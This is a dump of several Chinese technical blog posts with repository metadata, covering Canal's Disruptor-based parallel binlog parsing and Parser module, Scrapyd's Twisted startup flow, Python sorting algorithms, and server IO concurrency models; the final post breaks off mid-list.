"text": "---\ntitle: Canal系列04-并行解析Disruptor实现\ndate: 2019-06-19 23:03:14\ncategories: Canal系列\ntags: [canal]\n---\n## 一、Disruptor介绍\nDisruptor它是一个开源的并发框架,并获得2011 Duke’s 程序框架创新奖,能够在无锁的情况下实现网络的Queue并发操作。\n\n研发的初衷是解决内存队列的延迟问题(在性能测试中发现竟然与I/O操作处于同样的数量级)。基于Disruptor开发的系统单线程能支撑每秒600万订单,2010年在QCon演讲后,获得了业界关注。\n\n目前,包括Apache Storm、Camel、Log4j 2在内的很多知名项目都应用了Disruptor以获取高性能。在美团技术团队它也有不少应用,有的项目架构借鉴了它的设计机制。\n\nCanal在并行解析binlog的实现中使用了Disruptor,所有这里需要对Disruptor有一定的了解,更多的使用方法及原理请查阅文章下面的参考文献\n\n## 二、并行解析实现\n接上篇[Canal系列03-Parser模块](http://blog.7street.top/2019/06/17/canal03/)说到并行解析是Disruptor实现。下面的注释代码方便理解,需要对Disruptor有一定的了解才能理解哦。这也给我们提供了一个使用多阶段多线程使用Disruptor的最佳实践。\n```\npublic void start() {\n // 设置running状态字段\n super.start();\n this.exception = null;\n // 初始化RingBuffer,简单解析,事件深度解析,sink store多线程协作\n this.disruptorMsgBuffer = RingBuffer.createSingleProducer(new MessageEventFactory(),\n ringBufferSize,\n new BlockingWaitStrategy());\n int tc = parserThreadCount > 0 ? parserThreadCount : 1;\n this.parserExecutor = Executors.newFixedThreadPool(tc, new NamedThreadFactory(\"MultiStageCoprocessor-Parser-\" + destination));\n\n this.stageExecutor = Executors.newFixedThreadPool(2, new NamedThreadFactory(\"MultiStageCoprocessor-other-\" + destination));\n \n // barrier用来维护事件处理顺序的\n SequenceBarrier sequenceBarrier = disruptorMsgBuffer.newBarrier();\n ExceptionHandler exceptionHandler = new SimpleFatalExceptionHandler();\n // stage 2 -> 简单解析,事件类型、DDL解析构造TableMeta、维护位点信息、是否需要DML解析\n this.logContext = new LogContext();\n simpleParserStage = new BatchEventProcessor<MessageEvent>(disruptorMsgBuffer,\n sequenceBarrier,\n new SimpleParserStage(logContext));\n simpleParserStage.setExceptionHandler(exceptionHandler);\n disruptorMsgBuffer.addGatingSequences(simpleParserStage.getSequence());\n\n // stage 3 -> 事件深度解析 (多线程, DML事件数据的完整解析)\n SequenceBarrier dmlParserSequenceBarrier = disruptorMsgBuffer.newBarrier(simpleParserStage.getSequence());\n WorkHandler<MessageEvent>[] workHandlers = new DmlParserStage[tc];\n for (int i = 0; i < tc; i++) {\n // 事件解析 eventhandler\n workHandlers[i] = new DmlParserStage();\n }\n // 使用workerPool管理多个解析线程\n workerPool = new WorkerPool<MessageEvent>(disruptorMsgBuffer,\n dmlParserSequenceBarrier,\n exceptionHandler,\n workHandlers);\n Sequence[] sequence = workerPool.getWorkerSequences();\n disruptorMsgBuffer.addGatingSequences(sequence);\n\n // stage 4 -> 最后投递到store (单线程)\n SequenceBarrier sinkSequenceBarrier = disruptorMsgBuffer.newBarrier(sequence);\n sinkStoreStage = new BatchEventProcessor<MessageEvent>(disruptorMsgBuffer,\n sinkSequenceBarrier,\n new SinkStoreStage());// 将解析后的event存储到transactionBuffer中\n sinkStoreStage.setExceptionHandler(exceptionHandler);\n disruptorMsgBuffer.addGatingSequences(sinkStoreStage.getSequence());\n\n // start work,启动各个阶段的处理线程\n stageExecutor.submit(simpleParserStage);\n stageExecutor.submit(sinkStoreStage);\n workerPool.start(parserExecutor);\n }\n```\n## 三、参考文献\n[高性能队列—Disruptor](https://tech.meituan.com/2016/11/18/disruptor.html)\n[并发框架DISRUPTOR译文](https://coolshell.cn/articles/9169.html)"
},
{
"alpha_fraction": 0.7137874960899353,
"alphanum_fraction": 0.7177400588989258,
"avg_line_length": 27.676666259765625,
"blob_id": "81a3a49a2d7eb341018b1e61efa5630072159e36",
"content_id": "9a6582b93a1604e66449630a7943e93908444234",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 10506,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 300,
"path": "/source/_posts/scrapyd-flow.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Scrapyd运行流程总结\ndate: 2018-07-26 22:35:20\ncategories: 源码研究 #文章文类\ntags: [Scrapyd,源码,python] #文章标签,多于一项时用这种格式\n---\n### 执行入口\n入口程序在Scrapyd源代码的setup.py中指定:\n[Github - Scrapyd](https://github.com/scrapy/scrapyd/blob/master/setup.py)\n```\n setup_args['entry_points'] = {'console_scripts': [\n # 打包后命令执行入口\n 'scrapyd = scrapyd.scripts.scrapyd_run:main'\n ]}\n```\n\n从代码可以看到,入口程序:scrapyd/scripts/scrapyd_run.py的main()函数;\n\n```\n#!/usr/bin/env python\n\nfrom twisted.scripts.twistd import run\nfrom os.path import join, dirname\nfrom sys import argv\nimport scrapyd\n\n# Scrapyd 命令入口\ndef main():\n\t# -n:非守护进程方式启动;\n\t# -y:使用用户指定的application,这里有txapp.py生成application\n argv[1:1] = ['-n', '-y', join(dirname(scrapyd.__file__), 'txapp.py')]\n # 执行twisted.scripts.twistd中的run()函数\n run()\n\nif __name__ == '__main__':\n main()\n```\n这里是使用twistd命令,参数:【-n;-y】具体功能可以查看twistd -h查看,注释也写清楚了。\n\n### Twisted源码解析\n\n最终执行的是twisted/scripts/twistd.py的run()方法;\n\n\n```\n# -*- test-case-name: twisted.test.test_twistd -*-\n# Copyright (c) Twisted Matrix Laboratories.\n# See LICENSE for details.\n\n\"\"\"\nThe Twisted Daemon: platform-independent interface.\n\n@author: Christopher Armstrong\n\"\"\"\n\nfrom __future__ import absolute_import, division\n\nfrom twisted.application import app\n\nfrom twisted.python.runtime import platformType\nif platformType == \"win32\":\n from twisted.scripts._twistw import ServerOptions, \\\n WindowsApplicationRunner as _SomeApplicationRunner\nelse:\n from twisted.scripts._twistd_unix import ServerOptions, \\\n UnixApplicationRunner as _SomeApplicationRunner\n\ndef runApp(config):\n runner = _SomeApplicationRunner(config)\n # 调用twisted.scripts._twistd_unix.UnixApplicationRunner.run()方法\n runner.run()\n if runner._exitSignal is not None:\n app._exitWithSignal(runner._exitSignal)\n\n\ndef run():\n\t# 直接调用twisted.application.app.run()方法,这里最终调用上面 的runApp(config)方法\n app.run(runApp, ServerOptions)\n\n\n__all__ = ['run', 'runApp']\n```\n\n代码不多,直接贴上了。正如注释中所写,程序最终调用的是UnixApplicationRunner(Linux下)或者WindowsApplicationRunner(Windows下)的run()方法;\n\n下面使用UnixApplicationRunner进行下面的流程。\n\n```\n# 启动application\ndef run(self):\n \"\"\"\n Run the application.\n \"\"\"\n # 预处理,检查进程ID,输入输出\n self.preApplication()\n # 获取application,创建or根据用户指定的实例化\n self.application = self.createOrGetApplication()\n\n self.logger.start(self.application)\n # 启动application & 事件循环\n self.postApplication()\n self.logger.stop()\n```\n\n这里createOrGetApplication()方法,就是用来加载前面scrapyd入口脚本中-y指定的txapp.py中的application的,这个到后面启动Service的时候,还会出现。\n\n调用postApplication()启动应用和Twisted的事件循环;\n\n```\ndef postApplication(self):\n \"\"\"\n To be called after the application is created: start the application\n and run the reactor. 
After the reactor stops, clean up PID files and\n such.\n \"\"\"\n try:\n #启动应用\n self.startApplication(self.application)\n except Exception as ex:\n statusPipe = self.config.get(\"statusPipe\", None)\n if statusPipe is not None:\n message = self._formatChildException(ex)\n untilConcludes(os.write, statusPipe, message)\n untilConcludes(os.close, statusPipe)\n self.removePID(self.config['pidfile'])\n raise\n else:\n statusPipe = self.config.get(\"statusPipe\", None)\n if statusPipe is not None:\n untilConcludes(os.write, statusPipe, b\"0\")\n untilConcludes(os.close, statusPipe)\n # 启动Twisted事件循环\n self.startReactor(None, self.oldstdout, self.oldstderr)\n self.removePID(self.config['pidfile'])\n \ndef startApplication(self, application):\n \"\"\"\n Configure global process state based on the given application and run\n the application.\n\n @param application: An object which can be adapted to\n L{service.IProcess} and L{service.IService}.\n \"\"\"\n process = service.IProcess(application)\n if not self.config['originalname']:\n launchWithName(process.processName)\n self.setupEnvironment(\n self.config['chroot'], self.config['rundir'],\n self.config['nodaemon'], self.config['umask'],\n self.config['pidfile'])\n\n service.IService(application).privilegedStartService()\n\n uid, gid = self.config['uid'], self.config['gid']\n if uid is None:\n uid = process.uid\n if gid is None:\n gid = process.gid\n if uid is not None and gid is None:\n gid = pwd.getpwuid(uid).pw_gid\n\n self.shedPrivileges(self.config['euid'], uid, gid)\n # 启动application\n app.startApplication(application, not self.config['no_save'])\n```\n\n这里最终还是调用app.startApplication();\n\n```\ndef startApplication(application, save):\n from twisted.internet import reactor\n # 这里就启动了twistd的application,application内部会有多个Service&component\n service.IService(application).startService()\n if save:\n p = sob.IPersistable(application)\n reactor.addSystemEventTrigger('after', 'shutdown', p.save, 'shutdown')\n reactor.addSystemEventTrigger('before', 'shutdown',\n service.IService(application).stopService)\n```\n\n到这个地方,一般正常使用Twisted的应用就是这么启动的。\n具体怎么启动(startService)的?这块儿,我纠结的两天时间。\n\n其实,这个地方的Twisted Application是个Componentized mixin,具体还得从上面我们指定的txapp.py看起。\n\n```\n# scrapyd/txapp.py\n\n# this file is used to start scrapyd with twistd -y\nfrom scrapyd import get_application\napplication = get_application()\n\n\n# scrapyd/__init__.py\n\nimport pkgutil\n\n__version__ = pkgutil.get_data(__package__, 'VERSION').decode('ascii').strip()\nversion_info = tuple(__version__.split('.')[:3])\n\nfrom scrapy.utils.misc import load_object\nfrom scrapyd.config import Config\n\n\ndef get_application(config=None):\n if config is None:\n config = Config()\n apppath = config.get('application', 'scrapyd.app.application')\n appfunc = load_object(apppath)\n return appfunc(config)\n \n\n```\n\n这个地方最终return的是scrapyd/app.py的Application;这才是Scrapyd的核心实现:\n\n```\nfrom twisted.application.service import Application\nfrom twisted.application.internet import TimerService, TCPServer\nfrom twisted.web import server\nfrom twisted.python import log\n\nfrom scrapy.utils.misc import load_object\n\nfrom .interfaces import IEggStorage, IPoller, ISpiderScheduler, IEnvironment\nfrom .eggstorage import FilesystemEggStorage\nfrom .scheduler import SpiderScheduler\nfrom .poller import QueuePoller\nfrom .environ import Environment\nfrom .config import Config\n\ndef application(config):\n app = Application(\"Scrapyd\")\n # 监听端口\n http_port = config.getint('http_port', 6800)\n # 绑定IP地址\n 
bind_address = config.get('bind_address', '127.0.0.1')\n    # TimerService的轮询间隔\n    poll_interval = config.getfloat('poll_interval', 5)\n\n    # 队列 -- 每个project一个队列\n    poller = QueuePoller(config)\n    # 打包 & 部署后的egg路径\n    eggstorage = FilesystemEggStorage(config)\n    # 调度器\n    scheduler = SpiderScheduler(config)\n    # 环境变量\n    environment = Environment(config)\n\n    # Application是Componentized mixin,可以set很多组件\n    app.setComponent(IPoller, poller)\n    app.setComponent(IEggStorage, eggstorage)\n    app.setComponent(ISpiderScheduler, scheduler)\n    app.setComponent(IEnvironment, environment)\n\n    # launcher 具体启停Spider等,执行相应的命令\n    laupath = config.get('launcher', 'scrapyd.launcher.Launcher')\n    laucls = load_object(laupath)\n    launcher = laucls(config, app)\n\n    webpath = config.get('webroot', 'scrapyd.website.Root')\n    webcls = load_object(webpath)\n\n    # 每5秒钟从队列中取出已经schedule到队列中的Spider执行\n    timer = TimerService(poll_interval, poller.poll)\n    # web服务,接收web请求,包括查看log,启动Spider,列出所有project等等。。。\n    webservice = TCPServer(http_port, server.Site(webcls(config, app)), interface=bind_address)\n    log.msg(format=\"Scrapyd web console available at http://%(bind_address)s:%(http_port)s/\",\n            bind_address=bind_address, http_port=http_port)\n\n    # 这里是重点了,setServiceParent将app设置为自身的parent,同时会调用自身的startService()方法(因为launcher、timer、webservice都是IService的),这样每个Service都启动了。\n    # 这个地方纠结了两天。。。\n    launcher.setServiceParent(app)\n    timer.setServiceParent(app)\n    webservice.setServiceParent(app)\n\n    return app\n```\n### Scrapyd的核心实现\n主要包括以下3个主要服务:\n- Launcher\n  - 主要功能是执行调度任务,从Poller中获取已经调度的任务并执行\n- TCPServer\n  - 主要提供Web服务,通过Http接收请求。包括Job、Schedule、Logs等等\n- TimerService\n  - 周期执行(5s),主要功能是从Web Server接收的调度任务中,每次每个project调度一个任务给Launcher执行\n\n以及下面两个辅助的数据结构:\n\n- Poller\n  - 对队列使用的一层抽象\n- SqliteSpiderQueue\n  - 使用Sqlite作为队列底层存储的抽象\n\n\n\n为了方便理解,看代码的时候总结了一张思维导图。如导图中所描述的,Scrapyd的三个核心服务组成一个任务环,中间通过Poller和SqliteSpiderQueue两个辅助数据结构,实现类似生产者消费者的模式。\n\n这就是Scrapyd的核心实现,实现了简单日志监控、任务调度、项目发布等基本功能接口,解决了Scrapy使用过程中的部分痛点。\n由于Scrapyd的使用还是面向程序员,管理控制台比较简陋且功能不完善,所以才有了Gerapy的出现,可以在管理控制台上实现项目发布、启动Spider等等。但Gerapy做的也不太完善,比如周期性调度Spider等还没有实现,可能在开发中。。。"
},
{
"alpha_fraction": 0.5335820913314819,
"alphanum_fraction": 0.5746268630027771,
"avg_line_length": 27.846153259277344,
"blob_id": "a63c0b7ced48d2492d47f68082b86e9987e5b8ef",
"content_id": "734aad4bd35cbeb15922d86ab39ff8d67aa39665",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2724,
"license_type": "no_license",
"max_line_length": 261,
"num_lines": 65,
"path": "/source/_posts/sort.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "title: '排序算法'\ndate: 2014-07-09 00:02:53\ncategories: 算法 #文章文类\ntags: [算法,快排,python] #文章标签,多于一项时用这种格式\n---\n\n### 1.选择排序:\n**思想**:[选择排序](http://baike.baidu.com/view/547263.htm?fr=aladdin)是简单但不稳定的排序算法,时间复杂度为O(n^2),是选择最小(或最大)的元素插入到当前主循环位置上。\n``` bash\ndef select_sort(li):\n for i in range(0, len(li)-1):\n min = i+1\n # 找出i+1之后元素中最下的一个\n for j in range(i+1, len(li)):\n if li[j] < li[min]:\n min = j\n # 如果后面的元素小,则交换\n if li[i] > li[min]:\n li[i], li[min] = li[min], li[i]\n```\n\t\n \n### 2.插入排序: \n**思想**:[插入排序](http://baike.baidu.com/view/396887.htm?fr=aladdin)是一种简单且稳定的排序算法,时间复杂度为O(n^2),算法默认主循环之前的为有序,主循环之后的相继找到他应在的位置,保证主循环之前有序,直到循环结束。\n\n``` bash\ndef insert_sort(li):\n for i in range(1, len(li)):\n # 这里需要注意range函数在倒序的时候 获取最后(也就是索引为0)的元素时 end 要用-1 使用0总是落下第一个元素\n # 调试了很长时间 谨记\n for j in range(i-1, -1, -1):\n if li[j] > li[j+1]:\n li[j], li[j+1] = li[j+1], li[j]\n```\n \n### 3.快速排序\n\n[快速排序](http://baike.baidu.com/view/19016.htm?from_id=2084344&type=syn&fromtitle=%E5%BF%AB%E9%80%9F%E6%8E%92%E5%BA%8F&fr=aladdin)是对冒泡排序的改进,时间复杂度为O(n*log2n).基本思想是:通过一趟排序将要排序的数据分割成独立的两部分,其中一部分的所有数据都比另外一部分的所有数据都要小,然后再按此方法对这两部分数据分别进行快速排序,整个排序过程可以递归进行,以此达到整个数据变成有序序列。\n\n```bash\n# 将数组中元素按某个默认元素key分开,其前面的元素都小于key,其后面元素都大于key,返回key所在的索引\ndef divide_two(li, low, high):\n flag = li[low]\n while low < high:\n while low < high and li[high] > flag:\n high -= 1\n if low < high:\n li[low] = li[high]\n low += 1\n\n while low < high and li[low] < flag:\n low += 1\n if low < high:\n li[high] = li[low]\n high -= 1\n li[low] = flag\n return low\n\n# 递归调用,完成排序\ndef quick_sort(li, low, high):\n if low < high:\n mid = divide_two(li, low, high)\n quick_sort(li, 0, mid-1)\n quick_sort(li, mid+1, high)\n```\n\n"
},
{
"alpha_fraction": 0.4788624048233032,
"alphanum_fraction": 0.48185157775878906,
"avg_line_length": 47.99581527709961,
"blob_id": "9b5ea381a2f39760dda42fd944906fe3bb9f1902",
"content_id": "f61a1554191e0bfec27aa643d209934a341cf2b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 12883,
"license_type": "no_license",
"max_line_length": 241,
"num_lines": 239,
"path": "/source/_posts/canal03.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Canal系列03-Parser模块\ndate: 2019-06-17 23:31:29\ncategories: Canal系列\ntags: [canal]\n---\n## 一、入口\n接上节,从Spring配置文件file-instance.xml中可以看到,eventParser继承了base-instance.xml中的baseEventParser,查看base-instance.xml可以看到,eventParser是com.alibaba.otter.canal.parse.inbound.mysql.rds.RdsBinlogEventParserProxy的实例,就是调用的RdsBinlogEventParserProxy的start()方法。\n\n```\n# file-instance.xml\n<bean id=\"eventParser\" parent=\"baseEventParser\">\n\n# base-instance.xml\n<bean id=\"baseEventParser\" class=\"com.alibaba.otter.canal.parse.inbound.mysql.rds.RdsBinlogEventParserProxy\" abstract=\"true\">\n <property name=\"accesskey\" value=\"${canal.aliyun.accesskey:}\" />\n <property name=\"secretkey\" value=\"${canal.aliyun.secretkey:}\" />\n <property name=\"instanceId\" value=\"${canal.instance.rds.instanceId:}\" />\n</bean>\n```\n\n## 二、代码解析\nRdsBinlogEventParserProxy.start()方法一路super.start(),最终调用的是父类AbstractEventParser的start()方法。\n```\n// eventParser start一路super最终调用的是AbstractEventParser的start()方法\npublic void start() {\n // 设置running为true\n super.start();\n MDC.put(\"destination\", destination);\n // 配置transaction buffer\n // 初始化缓冲队列\n transactionBuffer.setBufferSize(transactionSize);// 设置buffer大小\n transactionBuffer.start();\n // 构造bin log parser\n binlogParser = buildParser();// 初始化一下BinLogParser\n binlogParser.start();\n // 启动工作线程\n parseThread = new Thread(new Runnable() {\n\n public void run() {\n MDC.put(\"destination\", String.valueOf(destination));\n ErosaConnection erosaConnection = null;\n while (running) {\n try {\n // 开始执行replication\n // 1. 构造Erosa连接\n erosaConnection = buildErosaConnection();\n\n // 2. 启动一个心跳线程\n startHeartBeat(erosaConnection);\n\n // 3. 执行dump前的准备工作\n preDump(erosaConnection);\n\n erosaConnection.connect();// 链接\n\n long queryServerId = erosaConnection.queryServerId();\n if (queryServerId != 0) {\n serverId = queryServerId;\n }\n // 4. 
获取最后的位置信息\n long start = System.currentTimeMillis();\n logger.warn(\"---> begin to find start position, it will be long time for reset or first position\");\n EntryPosition position = findStartPosition(erosaConnection);\n final EntryPosition startPosition = position;\n if (startPosition == null) {\n throw new PositionNotFoundException(\"can't find start position for \" + destination);\n }\n\n if (!processTableMeta(startPosition)) {\n throw new CanalParseException(\"can't find init table meta for \" + destination\n + \" with position : \" + startPosition);\n }\n long end = System.currentTimeMillis();\n logger.warn(\"---> find start position successfully, {}\", startPosition.toString() + \" cost : \"\n + (end - start)\n + \"ms , the next step is binlog dump\");\n // 重新链接,因为在找position过程中可能有状态,需要断开后重建\n erosaConnection.reconnect();\n // 非并行模式下,接到master的event交给sinkHandler处理\n final SinkFunction sinkHandler = new SinkFunction<EVENT>() {\n\n private LogPosition lastPosition;\n\n public boolean sink(EVENT event) {\n try {\n // 这里会调用binlogParser进行解析成CanalEntry.Entry\n CanalEntry.Entry entry = parseAndProfilingIfNecessary(event, false);\n\n if (!running) {\n return false;\n }\n\n if (entry != null) {\n exception = null; // 有正常数据流过,清空exception\n // 将数据存入内存队列中\n transactionBuffer.add(entry);\n // 记录一下对应的positions\n this.lastPosition = buildLastPosition(entry);\n // 记录一下最后一次有数据的时间\n lastEntryTime = System.currentTimeMillis();\n }\n return running;\n } catch (TableIdNotFoundException e) {\n throw e;\n } catch (Throwable e) {\n if (e.getCause() instanceof TableIdNotFoundException) {\n throw (TableIdNotFoundException) e.getCause();\n }\n // 记录一下,出错的位点信息\n processSinkError(e,\n this.lastPosition,\n startPosition.getJournalName(),\n startPosition.getPosition());\n throw new CanalParseException(e); // 继续抛出异常,让上层统一感知\n }\n }\n\n };\n\n // 4. 
开始dump数据,默认并行,使用disruptor.RingBuffer实现\n if (parallel) {\n // build stage processor\n multiStageCoprocessor = buildMultiStageCoprocessor();\n if (isGTIDMode() && StringUtils.isNotEmpty(startPosition.getGtid())) {\n // 判断所属instance是否启用GTID模式,是的话调用ErosaConnection中GTID对应方法dump数据\n GTIDSet gtidSet = MysqlGTIDSet.parse(startPosition.getGtid());\n ((MysqlMultiStageCoprocessor) multiStageCoprocessor).setGtidSet(gtidSet);\n multiStageCoprocessor.start();\n erosaConnection.dump(gtidSet, multiStageCoprocessor);\n } else {\n multiStageCoprocessor.start();\n if (StringUtils.isEmpty(startPosition.getJournalName())\n && startPosition.getTimestamp() != null) {\n erosaConnection.dump(startPosition.getTimestamp(), multiStageCoprocessor);\n } else {\n erosaConnection.dump(startPosition.getJournalName(),\n startPosition.getPosition(),\n multiStageCoprocessor);\n }\n }\n } else {\n if (isGTIDMode() && StringUtils.isNotEmpty(startPosition.getGtid())) {\n // 判断所属instance是否启用GTID模式,是的话调用ErosaConnection中GTID对应方法dump数据\n // 这里会不断的向master fetch binlog直到running为false\n erosaConnection.dump(MysqlGTIDSet.parse(startPosition.getGtid()), sinkHandler);\n } else {\n if (StringUtils.isEmpty(startPosition.getJournalName())\n && startPosition.getTimestamp() != null) {\n erosaConnection.dump(startPosition.getTimestamp(), sinkHandler);\n } else {\n erosaConnection.dump(startPosition.getJournalName(),\n startPosition.getPosition(),\n sinkHandler);\n }\n }\n }\n } catch (TableIdNotFoundException e) {\n exception = e;\n // 特殊处理TableIdNotFound异常,出现这样的异常,一种可能就是起始的position是一个事务当中,导致tablemap\n // Event时间没解析过\n needTransactionPosition.compareAndSet(false, true);\n logger.error(String.format(\"dump address %s has an error, retrying. caused by \",\n runningInfo.getAddress().toString()), e);\n } catch (Throwable e) {\n processDumpError(e);\n exception = e;\n if (!running) {\n if (!(e instanceof java.nio.channels.ClosedByInterruptException || e.getCause() instanceof java.nio.channels.ClosedByInterruptException)) {\n throw new CanalParseException(String.format(\"dump address %s has an error, retrying. \",\n runningInfo.getAddress().toString()), e);\n }\n } else {\n logger.error(String.format(\"dump address %s has an error, retrying. caused by \",\n runningInfo.getAddress().toString()), e);\n sendAlarm(destination, ExceptionUtils.getFullStackTrace(e));\n }\n if (parserExceptionHandler != null) {\n parserExceptionHandler.handle(e);\n }\n } finally {\n // 重新置为中断状态\n Thread.interrupted();\n // 关闭一下链接\n afterDump(erosaConnection);\n try {\n if (erosaConnection != null) {\n erosaConnection.disconnect();\n }\n } catch (IOException e1) {\n if (!running) {\n throw new CanalParseException(String.format(\"disconnect address %s has an error, retrying. 
\",\n runningInfo.getAddress().toString()),\n e1);\n } else {\n logger.error(\"disconnect address {} has an error, retrying., caused by \",\n runningInfo.getAddress().toString(),\n e1);\n }\n }\n }\n // 出异常了,退出sink消费,释放一下状态\n eventSink.interrupt();\n transactionBuffer.reset();// 重置一下缓冲队列,重新记录数据\n binlogParser.reset();// 重新置位\n if (multiStageCoprocessor != null && multiStageCoprocessor.isStart()) {\n // 处理 RejectedExecutionException\n try {\n multiStageCoprocessor.stop();\n } catch (Throwable t) {\n logger.debug(\"multi processor rejected:\", t);\n }\n }\n\n if (running) {\n // sleep一段时间再进行重试\n try {\n Thread.sleep(10000 + RandomUtils.nextInt(10000));\n } catch (InterruptedException e) {\n }\n }\n }\n MDC.remove(\"destination\");\n }\n });\n\n parseThread.setUncaughtExceptionHandler(handler);\n parseThread.setName(String.format(\"destination = %s , address = %s , EventParser\",\n destination,\n runningInfo == null ? null : runningInfo.getAddress()));\n parseThread.start();\n}\n```\n\n里面基本上都添加了注释,解析部分分两张情况,第一种是非并行模式下,使用sinkHandler解析并存储解析后的数据到缓冲队列中。第二种是并行情况下,使用Disruptor实现\n\n## 三、总结\n\n如上面设计图中所示,eventParser作为一个线程被启动,内部将自己伪装成mysql slave,与master通讯,fetch binlog,在通过binlog parser解析,最终sink到缓冲队列。并行模式下通过Disruptor实现并行解析的,下一部分重点看下Disruptor并行解析的实现。"
},
{
"alpha_fraction": 0.8389570713043213,
"alphanum_fraction": 0.8549079895019531,
"avg_line_length": 40.278480529785156,
"blob_id": "3f310fcf4df5782a17e483ea24f9d8f67dbbf893",
"content_id": "6b858b3e9a24d27a127e79f16d5eea91716b1594",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7842,
"license_type": "no_license",
"max_line_length": 221,
"num_lines": 79,
"path": "/source/_posts/concurrent-server.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 服务器并发模型实现\ndate: 2018-07-13 21:11:47\ncategories: IO\ntags: [IO,高并发,多路复用]\n---\n### 服务器并发需求\n对于像Nginx这样的网络服务器,每秒可能会接收到几或几十万的网络请求,并且还有数以十万的最近几秒没有收发任何报文的不活跃连接。服务器需要同时处理这些连接事件,并且需要维持高效率的使用CPU等资源。\n\n### 并发编程的两种实现模型\n1)线程模型(或进程模型)\n一个线程处理一个连接的全部生命周期。\n优点:模型足够简单,可以实现复杂的业务场景,线程个数可以远大于CPU个数\n缺点:\n- 1)线程个数不是无限增大的。\n- 2)调度策略比较低效\n> 线程的调度是由内核调度算法决定的,调度策略并不会考虑某个线程处理的IO情况,它统一由时间片来决定。这样可能调度起来的线程IO资源并没有准备好,又得继续睡眠。这样来回唤醒、睡眠线程,在线程总数特别多时,它的低效就被放大了。\n\n2)多路复用模型\n对于一个Network IO来说,通常涉及到两个系统对象,一个是调用这个IO的进程(或者线程),另一个是系统内核,在处理连接上的消息时,大概可以分两个阶段(**下面还会提到**):\n- **第一阶段:等待数据(消息)准备好【内核中执行】**\n- **第二阶段:将数据从内核拷贝到进程中(消息)处理【内核向用户进程拷贝】**\n\n高并发编程方法是将这两个阶段分开处理。这样要求套接字必须是非阻塞的。\n那么第一个阶段,“等待消息准备好”的实现方式有两种:\n- 1)线程主动查询\n- 2)让一个线程为所有连接等待(多路复用)\n多路复用就是处理等待消息准备好事件的,但可以处理多个连接。它本身也会“等待”,但由于一个线程处理多个连接或者所有的连接。这样当线程被唤醒时,一定会有连接准备好,所有它是有效率的。\n\n### 多路复用的实现方式\n1)select & poll\n2)epoll\n多路复用的核心是一个线程处理所有连接的“等待消息准备好”,这一点epoll和select都是这么实现的。\n当数以十万并发连接存在时,每秒可能只有几十或几百个活跃的连接,同时其余数十万连接在这一秒是非活跃的,当需要找出活跃的连接时,调用select返回所有的连接,从中找出几百个活跃连接,在高并发的服务器下,这种低效就会被放大。所以,在处理并发上万个连接时,select就力不从心了。\n\nepoll的实现添加了epoll_wait方法只返回活跃的连接,这样就没有上面select的问题,在高并发下依然很高效。\n\n多路复用是实现高并发服务器的一种有效方式,那么实现多路复用需要系统内核提供相应的支持,下面看下几种常用的IO模型。\n### 四种IO模型\n- 1)Blocking IO\n默认情况下,所有的Socket都是blocking的,当用户进程发起recvfrom系统调用时,内核就开始上面IO的第一个阶段:准备数据。对于网络io来说,通常一开始数据还没有到达,这时内核就要等待足够的数据到达,而用户进程会被阻塞。当内核等到的数据准备好了,就会执行IO的第二个阶段:拷贝数据到用户进程。然后内核返回结果,用户进程才重新运行起来。\n\n- 2)non-blocking IO\n通常需要应用程序设置Socket为non-blocking,当用户进程发起Read请求时,如果内核数据还没有准备好,会返回一个error。对用户进程来说,发起读请求后,不需要等待,马上就会得到一个结果。当结果是error时,就表示内核还没有准备好数据,于是需要用户进程再次发起Read请求。一旦内核中数据准备好了,用户进程再次发起Read请求时,内核就会将数据拷贝到用户进程,然后返回。\n\n这里用户进程是需要轮询内核数据是否准备好的。\n\n- 3)IO多路复用\nselect、poll、epoll都属于IO多路复用的实现。通常每个socket都设置为non-blocking。以select为例,当用户进程调用select后,用户进程会被block(是block在select系统调用上,不是block在socket IO上),同时,内核会监视所有select负责的socket,当任何一个socket上数据准备好了,select就会返回。这时用户进程再调用read操作,就会将数据从内核拷贝到用户进程。\n\n- 4)Asynchronous IO\nLinux内核暂时还没有提供支持。用户发起read操作后,立刻可以去做其他事。对内核来说,当接收到一个异步read操作后,首先会立刻返回,不会block用户进程。然后,内核会等待数据准备好,并将数据拷贝到用户进程,都完成后,内核会给用户进程发一个signal,通知用户进程read操作完成了。\n\n可见,在整个IO操作过程中,用户进程不需要去检查IO操作的状态,也不需要主动去内核空间拷贝准备好了的数据。也就是说将整个IO操作都交给内核,操作完成后内核通知用户进程。\n\n### 同步IO & 异步IO\nBlocking IO、non-blocking IO、IO多路复用属于同步IO,Asynchronous IO属于异步IO,其核心区别是IO操作的两个阶段是不是被阻塞了。\n\n同步IO中IO操作的第一个阶段:数据准备,可以阻塞也可以非阻塞,但第二个阶段:数据拷贝到用户进程,是肯定阻塞的。\n异步IO中IO操作的第一个阶段和第二个阶段都是非阻塞的。\n\n其实最主要的区别就是第二个阶段是否是非阻塞的。\n\n有了IO多路复用,有了epoll,我们已经可以使服务器并发几十万连接的同时,维持比较高的TPS。然而这只是一种模型,如何在工程上实现这种模型,Reactor就是解决这种软件工程问题的一种途径,它可以在软件工程层面,将事件驱动框架分离出具体业务,将不同类型请求之间用面向对象的思想分离。下面看看Reactor的几个关键参与者\n### Reactor模式的5个关键的参与者\n- 描述符(handle):有操作系统提供,用于识别事件。如Socket、文件描述符等\n\n- 同步事件分离器(demultiplexer):是一个函数,用来等待一个或多个事件发生。调用者会被阻塞,直到分离器分离的描述符集上有事件发生。常用的分离器有Linux的Select函数、poll、epoll、kqueue等。I/O框架库异步将各种I/O复用系统调用封装成统一的接口,称为事件多路分离器。调用者会被阻塞,直到分离器分离的描述符集上游事件发生。\n\n- 事件处理器接口(event handler):是由一个或多个模板函数组成的接口。这些模板函数描述了和应用程序相关的某个事件的操作。\n\n- 